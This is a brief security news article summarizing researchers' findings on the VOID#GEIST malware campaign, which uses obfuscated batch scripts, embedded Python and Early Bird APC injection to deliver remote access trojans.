Cybersecurity researchers have uncovered a sophisticated, multi-stage malware operation that utilizes obfuscated batch scripts as its primary delivery mechanism. Dubbed VOID#GEIST by Securonix Threat Research, this campaign ultimately deploys encrypted payloads for notorious remote access trojans (RATs) like XWorm, AsyncRAT, and Xeno RAT. The attack chain is designed to mimic legitimate administrative activity, starting with a batch script retrieved from a TryCloudflare domain and distributed through phishing emails.
The technical execution is notably stealthy. The initial script orchestrates the deployment of a second batch script, stages a legitimate embedded Python runtime, and decrypts encrypted shellcode. This shellcode is then injected directly into memory using a technique called Early Bird Asynchronous Procedure Call (APC) injection, targeting separate instances of the "explorer.exe" process. This fileless approach minimizes traces on disk, significantly reducing opportunities for traditional detection.
Researchers emphasize that this campaign reflects a broader trend where attackers are moving away from standalone executable files. Instead, they are adopting modular, script-based frameworks that blend in with normal system operations. By leveraging batch scripts for orchestration, PowerShell for stealth, and legitimate runtimes for portability, threat actors can operate persistently within a compromised environment without triggering standard security alerts.
The initial infection phase deliberately avoids privilege escalation, operating with the permissions of the logged-in user to maintain a low profile. Each component of the attack appears harmless in isolation, resembling routine administrative tasks, which allows the malware to establish a firm foothold before decrypting and executing its final RAT payloads for full system control.
